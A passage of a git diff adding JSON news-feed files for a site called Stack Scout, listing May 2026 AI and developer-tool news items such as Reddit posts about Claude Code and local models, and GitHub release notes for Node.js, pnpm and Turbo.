always working from stale context. I built it a fix it can rewind, replay, and stay ahead of every edit.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 0.99, + "date": "2026-05-04T10:33:23.000Z", + "summary": "Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to \"remind itself\" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking \"what does getUserById return?\" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. Your codebase is stored bi-temporally so every change becomes a recallable episode. When the agent debugs a r…", + "category": "ai_tools" + }, + { + "title": "ChatGPT’s fixation on my past conversations has made it borderline unusable", + "url": "https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/", + "source": "Reddit r/ChatGPT", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.96, + "date": "2026-05-04T03:07:30.000Z", + "summary": "in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. its like a new version of the “people pleasing“ that we were all griping about…", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.9 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.9", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.9199999999999999, + "date": "2026-05-04T20:55:20.000Z", + "summary": "\n\n## What's Changed\n### Changelog\n* release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700\n* fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699\n* release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705\n* fix: Scope repo index prefixes to Git root by @anthonyshew", + "category": "ai_tools" + }, + { + "title": "pnpm v11.0.5 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.5", + "source": "GitHub Releases · pnpm", + "tags": [ + "github_release", + "cli_tool" + ], + "matching_tags": [ + "github_release", + "cli_tool" + ], + "importance": 0.9199999999999999, + "date": "2026-05-04T20:22:16.000Z", + "summary": "## Patch Changes\r\n\r\n* Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS ", + "category": "ai_tools" + }, + { + "title": "A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.", + "url": "https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-04T19:07:33.000Z", + "summary": "A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.", + "category": "creative_tools" + }, + { + "title": "Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live", + "url": "https://x.com/peaq/status/2051288009081782473", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-04T14:56:47.726Z", + "summary": "peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore.", + "category": "ai_tools" + }, + { + "title": "AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures", + "url": "https://x.com/WesRoth/status/2051300819878936591", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T14:56:47.725Z", + "summary": "An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. It was the discovery.", + "category": "ai_tools" + }, + { + "title": "Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor", + "url": "https://x.com/ericzakariasson/status/2051255780167610522", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-04T14:56:47.725Z", + "summary": "The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness.", + "category": "ai_tools" + }, + { + "title": "Ace-Step-1.5-Api-server-UI", + "url": "https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-04T06:10:23.000Z", + "summary": "[Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support", + "category": "creative_tools" + }, + { + "title": "Meta Abandons Open Source — Days After LlamaCon", + "url": "https://x.com/thenewstack/status/2050017453615301067", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T23:53:43.957Z", + "summary": "Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-05.json b/data/news-feed-2026-05-05.json new file mode 100644 index 0000000..2ac0f3f --- /dev/null +++ b/data/news-feed-2026-05-05.json @@ -0,0 +1,269 @@ +{ + "generated": "2026-06-05T00:44:37.852Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-05", + "article_count": 15, + "archived_story_count": 540, + "articles": [ + { + "title": "torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-03T22:43:17.000Z", + "summary": "I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \\~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. **Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — \"Video Codecs are Secretly Tensor Codecs\"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The \"video codec on tensors\" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\\~4× compression floor, basically the Gaussian-noise limit). The PCA basis…", + "category": "ai_research" + }, + { + "title": "Released a TurboQuant-compatible KV backend evaluation SDK", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T17:12:04.000Z", + "summary": "Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \\- compressed KV block registration \\- KV dot / QK partial execution \\- block-local attention partial decode \\- capability probing \\- fallback and correctness reporting \\- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\\_compat\\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration.", + "category": "ai_models" + }, + { + "title": "Node.js v26.0.0 released (MAJOR UPDATE)", + "url": "https://github.com/nodejs/node/releases/tag/v26.0.0", + "source": "GitHub Releases · Node.js", + "tags": [ + "api_update", + "github_release", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "github_release", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-05T14:21:26.000Z", + "summary": "\n\n\nWe're excited to announce the release of Node.js 26! Highlights include the Temporal API enabled by default,\nupdates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals\nas we continue to modernize the platform.\n\nAs a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the \"Current\" release for the next six months.\nWe encourage you to explore the new features and benefits offered by this latest release a", + "category": "ai_tools" + }, + { + "title": "Anthropic ships Claude for Creative Work with nine MCP-native connectors", + "url": "https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T08:00:42.000Z", + "summary": "Anthropic announced Claude for Creative Work on April 28. The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work)", + "category": "ai_tools" + }, + { + "title": "Offload routine Claude Code work to Gemma 4 through the Google GenAI API", + "url": "https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-05T21:08:53.000Z", + "summary": "The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp)", + "category": "ai_tools" + }, + { + "title": "Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-05T20:31:23.000Z", + "summary": "We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming.", + "category": "ai_research" + }, + { + "title": "Gemini has a big outage going on but refuses to acknowledge on official status page! How do you know if an LLM API is actually down vs just you?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-05T16:22:20.000Z", + "summary": "Genuine question. Gemini had a 5+ hour outage this morning. I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \\- agents report 5xx errors anonymously and get back whether others are seeing the same thing. It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider=\"google\", model=\"gemini-2.5-flash\", error_code=503, error_type=\"overloaded\") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \\ -H \"Content-Type: application/json\" \\ -d '{\"provider\":\"google\",\"model\":\"gemini-2.5-fla…", + "category": "ai_tools" + }, + { + "title": "SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T15:02:15.000Z", + "summary": "SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before. The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope…", + "category": "ai_models" + }, + { + "title": "Local Dream 2.4.3 - SDXL support, tag autocomplete and more", + "url": "https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T11:53:55.000Z", + "summary": "Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \\- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \\- Tag autocomplete from CSV import \\- Token counter for prompts \\- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases)", + "category": "creative_tools" + }, + { + "title": "Building a 9-ball AI player: Candidate generation for direct cut shots [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/", + "source": "Reddit r/MachineLearning", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T23:00:30.000Z", + "summary": "I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \\~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \\~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la…", + "category": "ai_research" + }, + { + "title": "Parax v0.5: Parametric Modeling in JAX [P]", + "url": "https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T14:38:31.000Z", + "summary": "Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for \"parametric modeling\" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary", + "category": "ai_research" + }, + { + "title": "AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]", + "url": "https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T13:21:59.000Z", + "summary": "AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely by static analysis - the same artifact scores the same regardless of who reruns it. The headline finding is that scores cluster tightly. GLM 5 tops the benchmark run. qwen3.5-27b sits directly behind frontier models. Several local models produced enterprise-scale backends with 100% compile success. The author's interpretation: once the harness is structured, backend-generation quality is constrained more by harness design than by model prestige. The cost contrast is significant. A full benchmark run at frontier pricing ($5/M input tokens) runs $1,000-$1,500 per model. The next benchmark round plans to filter to models at $0.25/M input or runnable on a 64GB unified-memory laptop - which would include most of the models that clustered near the top anyway. The honest caveat from the author: this uses four reference projects and…", + "category": "ai_research" + }, + { + "title": "\"FLUX Creator Program\" - New Flux models sooner than expected?", + "url": "https://reddit.com/r/StableDiffusion/comments/1t4vlo7/flux_creator_program_new_flux_models_sooner_than/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-05T23:10:28.000Z", + "summary": "are we getting new Flux models soon? hopefully open source. Would love a new klein model [link](https://x.com/bfl_ml/status/2051723708046233688) to post", + "category": "creative_tools" + }, + { + "title": "Best Open Source models for running on Gaming PC or Mac mini M4", + "url": "https://reddit.com/r/StableDiffusion/comments/1t4p2mn/best_open_source_models_for_running_on_gaming_pc/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-05T19:04:40.000Z", + "summary": "I have a gaming PC with a Nvidia 5070 12gb VRAM 32gb RAM and a ryzen 9 7800x 12 core I also have a Mac mini m4 * Chip (Processor): Apple M4 chip with 10-core CPU, 10-core GPU, 16-core Neural Engine * Memory: 32GB unified memory * Storage: 512GB SSD storage Wanted to get opinions on best open source models for agentic and generative purposes on these machines Thank you!", + "category": "creative_tools" + }, + { + "title": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integrati…", + "url": "https://x.com/H_Mhatre_/status/2051715305890521578", + "source": "X / @h_mhatre_", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-05T17:27:02.000Z", + "summary": "OpenAI has released GPT-5.5 Instant as the new default model for ChatGPT. The update features improved reasoning benchmarks, reduced hallucinations in specialized fields, and enhanced context management with cross-platform memory integration. $MSFT", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-06.json b/data/news-feed-2026-05-06.json new file mode 100644 index 0000000..d8493de --- /dev/null +++ b/data/news-feed-2026-05-06.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:38.082Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-06", + "article_count": 15, + "archived_story_count": 542, + "articles": [ + { + "title": "[WIP] ComfyUI Powered Klein 2 KV Edit i2i plugin (Chromium)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t5rofv/wip_comfyui_powered_klein_2_kv_edit_i2i_plugin/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T22:12:19.000Z", + "summary": "This is something I am working on based upon an earlier WIP item that was using ZiT for something similar. However with Klein KV a lot of power to manipulate is in the prompts. So I am currently testing/building an i2i web browser plugin that allows custom prompt creating and saving and can be expanded and sorted by tabs. I'm going to post this link as a demo and/or bones for other to also take and run with as well. I do plan on updating some things here myself in my upcoming free time, but for some people this might be just what may work for them. At the end of the day it's all just html/js/css and we all have LLM's and enjoy open source. This can also be converted to a firefox plugin if you wish as well. Feel free to take it and do whatever else you may want to and consider this the starter template for it. [https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2\\_KVEdit\\_i2i%20-%20Chromium%20Sidebar-Demo.zip](https://github.com/deadinside/comfyui-workflows/blob/main/Web%20Browser%20Plugins/K2_KVEdit_i2i%20-%20Chromium%20Sidebar-Demo.zip) If you never interacted with ComfyUI outside of it, you will need to enable API mode in the settings. You will al…", + "category": "creative_tools" + }, + { + "title": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", + "url": "https://x.com/Reeperr131/status/2052074977973694608", + "source": "X search / Agent workflows", + "tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-06T17:16:15.000Z", + "summary": "OpenClaw/PENexus Agent update complete — All 11 agents configured with Discord routing, OpenClaw updated to 2026.5.5, new provider keys added, X API connected via xurl CLI", + "category": "ai_agents" + }, + { + "title": "CopilotKit (MIT) - Open-Source Building Blocks for Agent Apps and Generative UI", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t5gus6/copilotkit_mit_opensource_building_blocks_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-06T15:50:28.000Z", + "summary": "Even with agent framework DX getting somewhat better - it's still really annoying to build real apps with them. Even a basic in-app agent chatbot already drags in streaming, tool call rendering, and state sync. Vercel's AI SDK makes it much easier to start, but it pulls you right into Vercel's whole stack and is too opinionated on the agent framework side. This is what is great about CopilotKit (30k stars, MIT). They provide React building blocks for the agent UI layer: chat, streaming, tool calls, HITL, generative UI. The piece that makes it horizontal is AG-UI, an open protocol it speaks on the backend, with shipped support in LangGraph, ADK, Strands, CrewAI, Mastra, Pydantic AI, LlamaIndex, Agno, and others. Same UI, any agent framework, no per-framework adapter. Bring your own everything: agent, model, backend, hosting. It's really powerful. I discovered CopilotKit after being involved with the community on open source AG-UI which they're very involved with. Have had a great experience building with it! Not sure why people aren't talking about it more. Repo: [https://github.com/CopilotKit/CopilotKit](https://github.com/CopilotKit/CopilotKit)", + "category": "ai_models" + }, + { + "title": "2.5x faster inference with Qwen 3.6 27B using MTP - Finally a viable option for local agentic coding - 262k context on 48GB - Fixed chat template - Drop-in OpenAI and Anthropic API endpoints", + "url": "https://reddit.com/r/LocalLLaMA/comments/1t57xuu/25x_faster_inference_with_qwen_36_27b_using_mtp/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-06T09:35:42.000Z", + "summary": "> **WARNING: wait before download from HF: I just realised my upload of the new versions with the additional fix in the chat template has not completed yet. I will remove this warning once done** The recent PR to llama.cpp bring MTP support to Qwen 3.6 27B. This uses the built-in tensor layers for speculative decoding. None of the existing GGUF have it, as they need to be converted with this PR. I have tested it locally on my mac M2 Max 96GB, and the results are amazing: 2.5x speed increase, bringing it to 28 tok/s! In addition the recent releases of llama.cpp also support turboquants, which helps a lot with memory usage in more constrained environment (including an additional speed boost). I have converted the most useful quants and uploaded them to HF. Even if you are using apple silicon, you should use those instead of MLX. You can download them here: [https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF](https://huggingface.co/froggeric/Qwen3.6-27B-MTP-GGUF) This also includes 7 fixes I made to the original jinja chat template, due to vLLM specificity which broke in other tools: https://huggingface.co/froggeric/Qwen-Fixed-Chat-Templates For now, you will need to compile yo…", + "category": "ai_models" + }, + { + "title": "Getting error \"command 'claude-vscode.editor.openLast' not found\", but not like anyone has talked about.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t51ayl/getting_error_command_claudevscodeeditoropenlast/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-06T03:26:08.000Z", + "summary": "I've read many posts and github pages about this exact issue, but mine is different. Its not jsut that error. Any anthropic claude code command from logout to open in sidebar resutls in the error \"Command 'Claude Code: <command>' resulted in an error. command 'claude-vscode.sidebar.<command>' not found\". I have tried to diagnose and fix the issue and its not working. Here is what is not working: 1. Claude sidebar not working 2. No claude commands from command pallete working 3. Claude extension icon not showing up on far left side and not in the dropdown for extensions to show Here is the error from Developer: Show Logs.. with choosing Extension Host: `2026-05-05 21:57:07.411 [error] Activating extension Anthropic.claude-code failed due to an error:` `2026-05-05 21:57:07.412 [error] TypeError: The argument 'filename' must be a file URL object, file URL string, or absolute path string. Received 'file:///home/runner/work/claude-cli-internal/claude-cli-internal/build-agent-sdk/sdk.mjs'` `at Module.createRequire (node:internal/modules/cjs/loader:1922:13)` `at Object.<anonymous> (c:\\Users\\___\\.vscode\\extensions\\anthropic.claude-code-2.1.129-win32-x64\\extension.js:102:…", + "category": "ai_tools" + }, + { + "title": "UniReasoner: Using LLMs as \"Universal Reasoners\" to Fix Prompt Alignment", + "url": "https://reddit.com/r/StableDiffusion/comments/1t5p67x/unireasoner_using_llms_as_universal_reasoners_to/", + "source": "Reddit r/StableDiffusion", + 